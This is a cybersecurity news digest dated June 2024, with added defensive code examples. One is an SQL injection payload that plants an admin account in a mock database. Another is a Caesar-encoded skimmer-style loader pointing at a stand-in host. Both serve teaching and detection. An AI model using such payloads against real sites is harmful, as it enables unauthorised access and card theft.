Daily Brief

Articles are listed below; each summary is machine-generated.

Total articles found: 11824

Checks for new stories every ~15 minutes

2024-06-26 17:58:15 bleepingcomputer MISCELLANEOUS Critical Open-Source Projects Lack Memory-Safe Code, CISA Reports
CISA, together with the FBI and the Australian and Canadian cyber security agencies, reviewed 172 widely used open-source projects for memory safety. Over half of the projects (52%) contain code written in memory-unsafe languages, which raises the risk of memory-corruption bugs; Linux, Tor, Chromium and MySQL Server are among those with a high proportion of memory-unsafe code. C and C++ remain common because of their performance and maturity, despite the security cost. CISA advises adopting memory-safe languages such as Rust, Java and Go for new projects and migrating existing code where feasible, following secure coding practices, and testing continuously with static analysis, dynamic analysis and fuzzing. The report frames the trade-off between performance and security as an ongoing challenge, especially for software used in critical infrastructure.
2024-06-26 16:56:52 bleepingcomputer CYBERCRIME Critical SQL Injection Flaw in Fortra FileCatalyst Allows Unauthorized Access
A critical SQL injection vulnerability, CVE-2024-5276, affects Fortra FileCatalyst Workflow, a web application for large file transfers. A remote, unauthenticated attacker can use it to create administrative users and modify data in the application's database; according to the vendor it does not allow data exfiltration. Tenable researchers disclosed the flaw and published a proof-of-concept exploit that injects through the unsanitized 'jobID' parameter to create a new admin account and log in with it. Versions up to 5.1.6 Build 135 are affected; users should update to 5.1.6 Build 139. No in-the-wild exploitation had been reported at the time of writing, but the public exploit makes abuse far more likely. Fortra products are an attractive target: the Clop ransomware gang previously mass-exploited a flaw in Fortra's GoAnywhere MFT.
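The FileCatalyst bug above is a textbook case of a request parameter spliced into SQL text. The following is an added example, not FileCatalyst code and not Tenable's proof of concept: a mock "cancel job" handler written the vulnerable way beside the fixed version, with a hypothetical jobID payload that appends an INSERT to plant an admin account. The schema, table names and payload are constructed for the example; sqlite3 refuses stacked statements in execute(), so the vulnerable handler uses executescript() to stand in for drivers that run every statement they receive.

```python
import re
import sqlite3

# Constructed schema and seed data for a mock file-transfer "workflow" app.
# This is an illustrative example only, not FileCatalyst code.
SCHEMA = """
CREATE TABLE jobs  (job_id INTEGER PRIMARY KEY, filename TEXT, status TEXT DEFAULT 'queued');
CREATE TABLE users (username TEXT PRIMARY KEY, is_admin INTEGER NOT NULL DEFAULT 0);
INSERT INTO jobs  (job_id, filename) VALUES (1, 'quarterly.csv');
INSERT INTO users VALUES ('alice', 0);
"""

# Hypothetical attacker value for the jobID request parameter: closes the quoted
# literal, appends a second statement, and comments out whatever follows.
PAYLOAD = "1'; INSERT INTO users (username, is_admin) VALUES ('attacker', 1); --"


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def cancel_job_vulnerable(db: sqlite3.Connection, job_id: str) -> None:
    """BAD: the request parameter is spliced into the SQL text.

    sqlite3's execute() refuses stacked statements, so executescript() is used
    here to mimic database drivers that run every statement they are handed
    (MySQL with multi-statements, MSSQL, JDBC with allowMultiQueries=true).
    """
    sql = f"UPDATE jobs SET status = 'cancelled' WHERE job_id = '{job_id}';"
    db.executescript(sql)


_JOB_ID = re.compile(r"[0-9]{1,10}")


def cancel_job_safe(db: sqlite3.Connection, job_id: str) -> int:
    """GOOD: allow-list the input, then bind it as a parameter.

    Binding alone stops injection, because the driver sends the value as data,
    never as SQL text; the allow-list is defence in depth and gives a clean
    error for anything that is not a job number. Returns rows updated.
    """
    if not _JOB_ID.fullmatch(job_id):
        raise ValueError(f"invalid jobID: {job_id!r}")
    cur = db.execute(
        "UPDATE jobs SET status = 'cancelled' WHERE job_id = ?", (int(job_id),)
    )
    db.commit()
    return cur.rowcount


def admin_users(db: sqlite3.Connection) -> list:
    """Who holds admin rights: the first thing an incident responder checks."""
    rows = db.execute("SELECT username FROM users WHERE is_admin = 1 ORDER BY username")
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_db()
    cancel_job_vulnerable(db, PAYLOAD)
    print("vulnerable handler, admins now:", admin_users(db))  # ['attacker']

    db = make_db()
    try:
        cancel_job_safe(db, PAYLOAD)
    except ValueError as err:
        print("safe handler rejected input:", err)
    print("safe handler, admins now:", admin_users(db))  # []
```

Note that the allow-list is not what makes the safe handler safe; the parameter binding is. The regex exists so that a malformed value fails loudly at the edge instead of silently matching nothing, and so that audit logs show the rejected input.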
2024-06-26 15:04:24 thehackernews CYBERCRIME Urgent Patch Required for Active MOVEit Transfer Vulnerability
Progress Software's MOVEit Transfer has a critical vulnerability, CVE-2024-5806 (CVSS 9.1), that is under active exploitation and needs immediate patching. The flaw is an authentication bypass in the SFTP module; a related flaw, CVE-2024-5805, affects MOVEit Gateway and could likewise allow unauthorized server access. Researchers have shown the bug can be used to impersonate any user, which makes it substantially more dangerous. About 2,700 MOVEit Transfer instances are reachable from the internet, most of them in the U.S. and U.K. A previous MOVEit Transfer flaw was exploited in mass Cl0p ransomware attacks, which underscores the urgency. Separately, the U.S. CISA disclosed a breach of one of its own systems through an Ivanti Connect Secure vulnerability, part of the wider threat picture. Progress urges customers to update affected systems immediately.
2024-06-26 14:53:54 bleepingcomputer CYBERCRIME Hackers Exploit Critical Flaw in MOVEit File Transfer System
Attackers are targeting CVE-2024-5806, a newly disclosed critical authentication bypass in the SFTP module of Progress MOVEit Transfer. The Shadowserver Foundation observed the first exploitation attempts less than a day after the vendor's public disclosure. Roughly 2,700 MOVEit Transfer instances are exposed online, mostly in the US, UK, Germany, Canada and the Netherlands. watchTowr published a technical analysis, and researcher Sina Kheirkhah released proof-of-concept exploit code, so the details needed to attack unpatched systems are now public. A separate vulnerability in a third-party component used by MOVEit Transfer adds further risk; until it is fixed, Progress recommends interim mitigations such as blocking public inbound RDP access to MOVEit Transfer servers and limiting their outbound connections to known trusted endpoints. Fixes for CVE-2024-5806 are in MOVEit Transfer 2023.0.11, 2023.1.6 and 2024.0.2, and MOVEit Cloud customers have already been patched automatically.
2024-06-26 13:36:54 theregister CYBERCRIME MOVEit Software Hit by Critical Authentication Bypass Vulnerabilities
Progress Software disclosed two critical authentication bypass vulnerabilities, CVE-2024-5805 in MOVEit Gateway and CVE-2024-5806 in MOVEit Transfer, each rated 9.1. watchTowr's analysis of CVE-2024-5806 describes two distinct attacks. The less severe one forces the server to authenticate outbound over SMB, leaking credential material, and may affect other products that use the same SSH library in a similar configuration. The more severe one lets an attacker log in as any SFTP user and read, write or delete that user's files. Because neither attack needs malware on the host, the intrusion is file-less and leaves few traces. Exploitation attempts rose almost immediately after watchTowr's publication. Patch now: the previous round of MOVEit Transfer exploitation affected thousands of organizations.
2024-06-26 13:36:54 bleepingcomputer MALWARE Snowblind Malware Exploits Android Kernel Feature to Bypass Security
Snowblind, an Android malware family documented by the mobile app security company Promon, abuses the Linux kernel's seccomp facility to defeat an app's own anti-tampering checks. Promon received the sample through its partner i-Sprint, one of whose customers in Southeast Asia was targeted. The attacker repackages the target app with a native library that loads before the app's anti-tampering code runs; the library installs a seccomp filter that traps the system calls the checks use to open the APK, and the trap handler redirects those calls to an unmodified copy of the original package, so file-integrity verification passes while the tampered code keeps running. Promon notes the technique is not widely known or defended against in the mobile industry, is invisible to the user, and has a minimal footprint and performance cost because only the trapped system calls pay for the detour. Once the checks are bypassed, the malware can capture login credentials and perform actions in the app without the user noticing. Promon expects other attackers to adopt the approach, which threatens any Android app that relies on in-app integrity checks to protect sensitive data.
2024-06-26 10:17:11 thehackernews NATION STATE ACTIVITY State-Linked Hackers Use Ransomware to Target Global Infrastructure
Suspected Chinese and North Korean hackers used ransomware in attacks on government and critical infrastructure organizations worldwide between 2021 and 2023. One cluster is attributed to ChamelGang, a group first documented in 2021 and believed to operate from China; its victims included the All India Institute of Medical Sciences and the Presidency of Brazil, where it deployed the CatB ransomware. In these operations ransomware served several purposes at once: financial gain, disruption, distraction from the real objective, and destruction of evidence. ChamelGang's toolset includes BeaconLoader, Cobalt Strike and several custom backdoors, and its 2023 intrusions used updated tooling for deeper reconnaissance and data exfiltration. A second cluster encrypted victims with off-the-shelf tools, Jetico BestCrypt and Microsoft BitLocker, mainly against manufacturers in the Americas and Europe. Analysts note that ransomware gives state actors plausible deniability, blurring the line between financially motivated crime and state-sponsored espionage.
2024-06-26 09:56:40 thehackernews MISCELLANEOUS Effective Strategies for Enhancing Software Supply Chain Security
Regulators are pushing organizations to secure their software supply chains as attacks rise. Log4Shell showed how a single widely used open-source component can expose much of the industry, and Gartner predicts that 45% of organizations will have experienced a software supply chain attack by 2025. The problem is hard because development is spread across teams and geographies and leans heavily on open source. The recommended approach is DevSecOps, with controls applied consistently across code repositories, CI/CD pipelines and the infrastructure that builds and runs the software. Generating and maintaining software bills of materials (SBOMs) lets teams find affected components quickly when a zero-day lands; policy-as-code and the SLSA framework provide governance and verifiable provenance for build artifacts. Continuous discovery of assets and continuous testing round out the program.
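The practical payoff of an SBOM is the query you run the morning a Log4Shell-class advisory lands: which deployed artifacts contain the affected package in the affected version range? The following is an added example, not code from the article or from any SBOM tool: a small CycloneDX-style SBOM is constructed inline, and a function matches components by package URL prefix against a version range. The SBOM contents are illustrative; the log4j-core bound of 2.15.0 is the first Log4Shell fix release, but real queries should take their ranges from the advisory rather than from this example.

```python
import json

# Constructed CycloneDX-style SBOM fragment: illustrative data, not a real project's SBOM.
SBOM_JSON = """
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "components": [
    {"type": "library", "name": "log4j-core", "version": "2.14.1",
     "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
    {"type": "library", "name": "log4j-core", "version": "2.17.1",
     "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1?type=jar"},
    {"type": "library", "name": "log4j-api", "version": "2.14.1",
     "purl": "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1"},
    {"type": "library", "name": "jackson-databind", "version": "2.12.3",
     "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.12.3"}
  ]
}
"""


def load_sbom() -> dict:
    return json.loads(SBOM_JSON)


def parse_version(v: str) -> tuple:
    """Sortable key for dotted versions: '2.14.1' -> ((2, 14, 1), 1, '').

    A pre-release suffix ('2.0-beta9') sorts before the matching release,
    which matters when an advisory's 'introduced' bound is a beta build.
    """
    base, _sep, pre = v.partition("-")
    nums = tuple(int(part) for part in base.split(".") if part.isdigit())
    return (nums, 0 if pre else 1, pre)


def purl_version(purl: str) -> str:
    """Version from a package URL, with qualifiers (?...) and subpath (#...) removed."""
    version = purl.split("@", 1)[1] if "@" in purl else ""
    return version.split("?", 1)[0].split("#", 1)[0]


def affected_components(sbom: dict, purl_prefix: str, fixed_in: str, introduced: str = "0") -> list:
    """Return purls of components under purl_prefix with introduced <= version < fixed_in.

    purl_prefix is the type/namespace/name part, e.g.
    'pkg:maven/org.apache.logging.log4j/log4j-core'; matching on the purl rather
    than on the bare name avoids confusing log4j-core with log4j-api or with a
    same-named package from another ecosystem.
    """
    lo, hi = parse_version(introduced), parse_version(fixed_in)
    hits = []
    for comp in sbom.get("components", []):
        purl = comp.get("purl", "")
        if not purl.startswith(purl_prefix + "@"):
            continue
        if lo <= parse_version(purl_version(purl)) < hi:
            hits.append(purl)
    return hits


if __name__ == "__main__":
    sbom = load_sbom()
    core = "pkg:maven/org.apache.logging.log4j/log4j-core"
    print("vulnerable to the Log4Shell range:", affected_components(sbom, core, "2.15.0"))
```

Run the same query across every SBOM your build pipeline emits (one per artifact) and you have the list of deployments to patch first; the version key is deliberately simple, so ecosystems with richer schemes (semver build metadata, Debian epochs) need their own comparator.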
2024-06-26 09:41:08 thehackernews MALWARE Apple Releases Fix for Bluetooth Eavesdropping Vulnerability
Apple has issued a firmware update for AirPods to fix CVE-2024-27867, an authentication flaw in the Bluetooth pairing logic. It affects AirPods (2nd generation and later), AirPods Pro, AirPods Max, Powerbeats Pro and Beats Fit Pro. An attacker in Bluetooth range could spoof a previously paired device, connect to the headphones and listen in on conversations. The fix improves state management. Security researcher Jonas Dreßler reported the issue. Separately, Apple recently fixed CVE-2024-27812 in visionOS, a WebKit issue that could lead to a denial of service; researcher Ryan Pickren showed that a malicious web page could spawn 3D objects into a user's surroundings through ARKit's Quick Look feature without any interaction, which the update also addresses.
2024-06-26 08:39:19 thehackernews MALWARE New Credit Card Skimmer Hits Major CMS Platforms
A credit card skimmer dubbed the Caesar Cipher Skimmer is being planted on WordPress, Magento and OpenCart e-commerce sites to steal card and payment details during checkout. On WordPress the attackers edit the WooCommerce checkout template and disguise the injected loader as a Google Tag Manager or Google Analytics snippet. The loader is obfuscated with a simple Caesar shift so that neither the code nor the domain hosting the second-stage payload appears in plaintext, which defeats naive string matching. Further obfuscated scripts are dropped under names such as "style.css" and "css.php" so they pass for style sheets. Some samples contain Russian-language comments, suggesting Russian-speaking operators. Keep CMS cores and plugins updated, and watch for unexpected changes to checkout templates and for unfamiliar externally loaded scripts on payment pages.
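A Caesar shift hides strings from grep but not from a brute-force decoder, since there are only 25 shifts to try. The following is an added example, not the skimmer's code and not Sucuri's analysis tooling: a constructed loader fragment, shifted by 3 over ASCII letters, is recovered by trying every shift in two families (letters only, and every character code, the latter matching the "fromCharCode(c - n)" style) and keeping the candidate that contains the most JavaScript and URL markers. The sample text and its reserved ".invalid" domain are constructed for the example.

```python
import string

# Constructed sample in the style of the loader the article describes: a Caesar
# shift of 3 over ASCII letters. The host is a reserved example name, not a real
# skimmer domain, and this is example code rather than the skimmer's own.
SAMPLE = ('ydu v=grfxphqw.fuhdwhHohphqw("vfulsw");'
          'v.vuf="kwwsv://vwdwv.hadpsoh.lqydolg/fvv.sks";'
          'grfxphqw.khdg.dsshqgFklog(v);')

# Substrings a decoded JavaScript loader is likely to contain; more hits = better candidate.
MARKERS = ("http", "://", ".js", ".php", "script", "document", "src", "eval", "fromCharCode")


def caesar(text: str, k: int) -> str:
    """Shift ASCII letters by k positions, wrapping within the alphabet; other characters are untouched."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - 97 + k) % 26 + 97))
        elif ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - 65 + k) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def shift_codes(text: str, k: int) -> str:
    """Shift every character code by k: the String.fromCharCode(c - n) family of obfuscation."""
    return "".join(chr((ord(ch) + k) % 0x110000) for ch in text)


def score(text: str) -> int:
    return sum(1 for marker in MARKERS if marker in text)


def crack(obfuscated: str) -> tuple:
    """Try both shift families and every non-zero shift.

    Returns (mode, shift, plaintext) for the best-scoring candidate, or
    ("none", 0, input) when no shift beats the input as given.
    """
    best = ("none", 0, obfuscated)
    best_score = score(obfuscated)
    for mode, fn in (("alpha", caesar), ("charcode", shift_codes)):
        for k in range(1, 26):
            candidate = fn(obfuscated, -k)   # undo a forward shift of k
            s = score(candidate)
            if s > best_score:
                best, best_score = (mode, k, candidate), s
    return best


if __name__ == "__main__":
    mode, k, plain = crack(SAMPLE)
    print(f"mode={mode} shift={k}")
    print(plain)
```

The marker list is the weak point of any such cracker: it is tuned to loaders, so extend it with whatever the sample in front of you is expected to contain (form field names, "cc", "cvv", "XMLHttpRequest") before trusting a low score.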
2024-06-26 07:43:05 thehackernews MALWARE Medusa Trojan Expands Globally, Enhancing Stealth and Capabilities
Medusa, an Android banking Trojan first identified in 2020, is targeting users in seven countries: the US, UK, Canada, France, Italy, Spain and Turkey. The current campaign, active since July 2023, is distributed through five distinct botnets run by different affiliates. Cleafy reports that the latest variant requests fewer permissions than before, which lowers its profile, and adds features such as full-screen overlays and remote uninstall. Medusa began by targeting Turkish financial institutions and has since widened its scope, with keylogging, SMS reading and the ability to carry out fraudulent transactions from the device. Victims are infected through dropper apps posing as updates or utilities, and the malware uses Telegram channels as part of its command-and-control scheme, which complicates tracking and takedown. A recent addition is a black-screen overlay that makes the phone appear locked or off while fraud is carried out on it. Cleafy reads the changes as a deliberate effort to reach more victims and extend the Trojan's operational lifespan, and draws comparisons with campaigns such as Cerberus and SpyMax as evidence of the steady rise in sophisticated mobile threats.
2024-06-26 05:20:22 theregister CYBERCRIME Yahoo! Japan Waives $189 Million Due to Fraudulent Ad Clicks
Yahoo! Japan will not bill advertisers for roughly $189 million in ad clicks it determined were fraudulent rather than generated by real people, a sum equal to about 1.6% of parent LY Corporation's revenue. LY Corporation, formed from the combination of Yahoo! Japan and LINE, nevertheless reports improving ad quality: its transparency report shows unapproved ad creatives falling from over 133.5 million in 2022 to under 97 million in 2023, while detected fraudulent advertiser accounts held steady at 7,819 in 2023 versus 7,893 the year before. Proving that clicks come from humans is a problem across the industry, including for Google and Reddit, and ad-fraud cases and investigations go back at least to 2004.
2024-06-26 04:29:11 thehackernews CYBERCRIME Over 110,000 Sites Compromised in Polyfill.io Supply Chain Attack
Google has begun blocking ads on sites that load scripts from polyfill.io after the domain, acquired in February 2024 by a Chinese CDN company, started serving malicious code. More than 110,000 sites embed the polyfill.io script, and affected visitors are being redirected to malicious sites. Andrew Betts, who created the original Polyfill project, had already urged sites to remove it, since modern browsers no longer need the polyfills it provided; Cloudflare and Fastly offer drop-in replacement endpoints. The code served from cdn.polyfill.io is injected selectively and stays dormant when it detects an admin user or web analytics tooling, which delays detection. The article also notes a separate issue, CVE-2024-2961, a glibc iconv bug that can turn certain PHP file-read vulnerabilities into remote code execution. Both show why third-party hosts and dependencies need continuous monitoring rather than one-time vetting.
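The polyfill.io incident is a third-party script problem, and the first step in responding is an inventory of every script tag that points off-site. The following is an added example, not code from the article or from any of the vendors mentioned: it parses a constructed page fragment, flags scripts from hosts that should no longer be loaded at all, scripts with no Subresource Integrity attribute, and SRI on a cross-origin script without the crossorigin attribute the browser needs to verify it, and it computes the integrity value for a pinned copy you self-host. The host names, page and placeholder integrity value are constructed for the example. One caveat the audit makes visible: a dynamic service such as polyfill.io tailors its response to the User-Agent, so SRI can never be applied to it, which is itself the reason to self-host a fixed bundle.

```python
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed values for the example: the site's own host, and hosts the article
# says should no longer be loaded from at all.
FIRST_PARTY_HOSTS = {"shop.example.invalid"}
RETIRED_HOSTS = {"polyfill.io", "cdn.polyfill.io"}

# Constructed page fragment; the integrity values are placeholders, not real hashes.
SAMPLE_HTML = """
<html><head>
<script src="https://cdn.polyfill.io/v3/polyfill.min.js"></script>
<script src="https://cdn.example-cdn.invalid/lib/1.0.0/lib.min.js"
        integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
<script src="https://analytics.example.invalid/a.js"></script>
<script src="//tag.example-cdn.invalid/tag.js" integrity="sha384-PLACEHOLDER"></script>
<script src="/static/app.js"></script>
<script>window.cfg = {};</script>
</head><body></body></html>
"""


class ScriptCollector(HTMLParser):
    """Collect the attributes of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append(dict(attrs))


def audit_scripts(html: str) -> list:
    """Return (src, finding) pairs for externally hosted scripts that need attention."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.scripts:
        src = attrs.get("src")
        if not src:
            continue                                    # inline script: out of scope here
        host = (urlparse(src).hostname or "").lower()   # '' for relative URLs; handles //host paths
        if host == "" or host in FIRST_PARTY_HOSTS:
            continue
        if host in RETIRED_HOSTS:
            findings.append((src, "retired-host"))      # remove it, regardless of SRI
        elif not attrs.get("integrity"):
            findings.append((src, "no-sri"))
        elif "crossorigin" not in attrs:
            findings.append((src, "sri-without-crossorigin"))  # browser cannot verify without CORS
    return findings


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Integrity attribute value for a pinned, self-hosted copy of a script."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


if __name__ == "__main__":
    for src, finding in audit_scripts(SAMPLE_HTML):
        print(f"{finding:24} {src}")
    print(sri_hash(b"/* pinned local copy of the polyfill bundle */"))
```

Run this over rendered pages rather than templates where you can, since tag managers and plugins add script tags at runtime, and treat every "no-sri" result on a payment page as a task: pin a copy, hash it, and serve it from a first-party host.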
2024-06-26 03:46:44 theregister MISCELLANEOUS Study Reveals Misuse of Trackers in Crime and Domestic Violence
Project Hakea, a study by the New South Wales Crime Commission in Australia, found that tracking devices are widely misused by organized crime groups and by domestic violence offenders. The top 100 purchasers of devices such as GPS trackers and Bluetooth tags like Apple AirTags were far more likely than the general population to have a history of violence or links to organized crime. The commission tied trackers to more than 20 serious crimes since 2016, including murders, kidnappings and drive-by shootings. In domestic violence cases, a large share of offenders told their victims about the tracker, using it as an instrument of intimidation and control. The report calls for tighter regulation of the sale of trackers and of marketing that promotes illegal uses, and welcomes anti-stalking features in smartphones while urging more manufacturers to support them. The overlap between criminal tracking and domestic abuse, the commission argues, warrants prompt legal and regulatory action.
2024-06-26 01:08:47 theregister DATA BREACH Over One Million Patient Records Stolen in Nuance Security Lapse
Geisinger, a large U.S. healthcare provider, says the records of more than a million patients were likely stolen through Microsoft-owned Nuance Communications, one of its contractors. A former Nuance employee whose access was not revoked when the employment ended used it to retrieve patient data. The exposed data includes dates of birth, addresses, hospital records and demographic details; no financial information is reported as taken. Geisinger detected the activity on November 29, 2023 and alerted Nuance, which cut off the ex-employee's access at once. Notification of patients was delayed at law enforcement's request so as not to compromise the investigation. The former employee has been arrested and faces federal charges, though the charges have not been detailed. Nuance had a similar incident in 2018, and the case adds to recent criticism of Microsoft's security practices. The control that failed here is routine offboarding: access held by a vendor's staff needs to be revoked on the day they leave, just as an internal account would be.